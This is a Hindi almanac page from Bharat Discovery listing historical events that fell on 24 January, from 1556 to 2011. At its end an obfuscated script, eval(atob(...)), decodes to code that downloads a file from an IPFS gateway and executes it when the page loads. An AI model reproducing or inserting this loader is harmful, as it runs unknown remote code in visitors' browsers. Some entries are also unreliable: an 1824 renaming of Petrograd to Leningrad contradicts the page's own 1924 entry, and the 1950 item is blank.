24 जनवरी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.


ग्रेगोरी कैलंडर के अनुसार 24 जनवरी वर्ष का 24 वाँ दिन है। साल में अभी और 341 दिन शेष हैं। (लीप वर्ष में 342 दिन)

24 जनवरी की महत्त्वपूर्ण घटनाएँ

  • 2011 - मॉस्को के डोनोडिडोवो हवाई अड्डे पर बम विस्फोट से 35 लोगों की मौत, 180 घायल।
  • 2010 - वर्ष 2008 के लिए 56वें राष्ट्रीय फ़िल्म पुरस्कारों की घोषणा की गई। फ़िल्म 'अंतहीन' को सर्वश्रेष्ठ फीचर फ़िल्म, मराठी अभिनेता उपेंद्र लिमये को सर्वश्रेष्ठ अभिनेता और अभिनेत्री प्रियंका चोपड़ा को सर्वश्रेष्ठ अभिनेत्री चुना गया। श्रीबाला को तमिल फ़िल्म 'नान कादाउद' के लिए सर्वश्रेष्ठ निर्देशक पुरस्कार के लिए चुना गया। फरहान अख्तर की फ़िल्म 'रॉक ऑन' को सर्वश्रेष्ठ हिन्दी फ़िल्म के राष्ट्रीय पुरस्कार मिला।
  • 2008 -
    • उत्तर प्रदेश में 'सैनिटेशन पॉलिसी' के लिए 'टास्क फोर्स' गठित हुई। पूर्व थल सेना अध्यक्ष जे.जे. सिंह को अरुणाचल प्रदेश का राज्यपाल बनाया गया।
    • अफ़ग़ानिस्तान की एक अदालत ने एक पत्रकार को इस्लाम का अपमान करने के मामले में सज़ा-ए-मौत की सज़ा सुनाई। पाकिस्तानी सेना ने दक्षिणी वजीरिस्तान में अफ़ग़ान सीमा के निकट आतंकवादियों के साथ भीषण संघर्ष में तीन इलाकों को मुक्त कराया।
  • 2007 - रूस एवं भारत के बीच एटमी रिएक्टर बनाने हेतु समझौता हुआ।
  • 2005 -
    • आंध्र प्रदेश के तेलगुदेशम के विधायक परिताला रवि की गोली मारकर हत्या करा दी गयी।
    • गणतंत्र दिवस समारोह 2005 के मुख्य अतिथि भूटान नरेश जिग्मे सिंघे वांगचुक भारत पहुँचे।
  • 2003 -
    • उत्तर कोरिया और दक्षिण कोरिया परमाणु संकट के शांतिपूर्ण समाधान पर सहमत।
    • भारत और फ्रांस के बीच प्रत्यर्पण संधि।
  • 2002 -
    • संयुक्त राष्ट्र महासचिव कोफी अन्नान इस्लामाबाद पहुँचे, भारत और पाकिस्तान के बीच मध्यस्ता की पुन: पेशकश की, एनरान के अध्यक्ष केनेथ ली ने इस्तीफ़ा दिया।
    • भारतीय उपग्रह इनसेट-3सी सफलतापूर्वक अपनी कक्षा में स्थापित।
  • 2001 - जैव सुरक्षा संधि पर भारत के हस्ताक्षर, जोसेफ काबिला के राष्ट्रपति बनने पर संसद की मंजूरी।
  • 2000 - चुनावों में दलितों का आरक्षण 10 वर्ष तक बढ़ाने हेतु संविधान के 79वें संशोधन को राष्ट्रपति की मंजूरी।
  • 1996 - सं.रा. अमेरिका के इतिहास में पहली बार देश की प्रथम महिला हिलेरी क्लिंटन को न्यायालय में पेश होने का आदेश दिया गया।
  • 1993 -
    • सोयूज टी.एम. 16 प्रक्षेपित किया गया।
    • सोमालिया में अमेरिकी सैनिकों के साथ संघर्ष में तीन व्यक्ति मारे गये और अनेक घायल हो गये।
  • 1991 - लिथुआनिया गणराज्य ने सोवियत संघ के सैनिकों हटाने की मांग की।
  • 1989 - पेरू में सोने की खान में एक सौ से अधिक श्रमिक फँस गये।
  • 1979 - अमेरिका ने नेवादा में परमाणु परीक्षण किया।
  • 1973 - अमेरिका ने वियतनाम युद्ध बंद होने के साथ लाओस और कंबोडिया में भी युद्धबंदी का ऐलान किया गया।
  • 1966 -
    • एयर इंडिया का बोइंग आल्पस में दुर्घटनाग्रस्त हुआ जिसमें डॉ. होमी भाभा सहित 114 लोग मारे गये।
    • प्रसिद्ध भारतीय वैज्ञानिक एवं देश के परमाणु कार्य्रकम के जनक होमी जहांगीर भाभा का निधन हुआ।
  • 1965 - ब्रिटेन के पूर्व प्रधानमंत्री सर विंस्टन चर्चिल का निधन।
  • 1952 - मुम्बई में 'पहला अंतरराष्ट्रीय फ़िल्म' महोत्सव आयोजित किया गया।
  • 1951 - प्रेम माथुर भारत की पहली महिला कमर्शियल पायलट बनीं।
  • 1950 -
  • 1939 - चिली में भूकंप से 30 हजार लोग मरे।
  • 1936 - अलबर्ट सैरुएट फ्रांस के प्रधानमंत्री बने।
  • 1924 - रूस के सेंट पीट्सबर्ग शहर का नाम बदलकर लेनिनग्राद किया गया।
  • 1857 - कलकत्ता विश्वविद्यालय की स्थापना।
  • 1839 - चार्ल्स डार्विन रॉयल सोसायटी के फेलो चुने गये।
  • 1824 - रूस में पेट्रोग्राद का नाम बदलकर लेनिनग्राद कर दिया गया।
  • 1556 - चीन में भीषण भूकम्प में आठ लाख तीस हज़ार लोगों की मौत हुई।

24 जनवरी को जन्मे व्यक्ति

24 जनवरी को हुए निधन

24 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>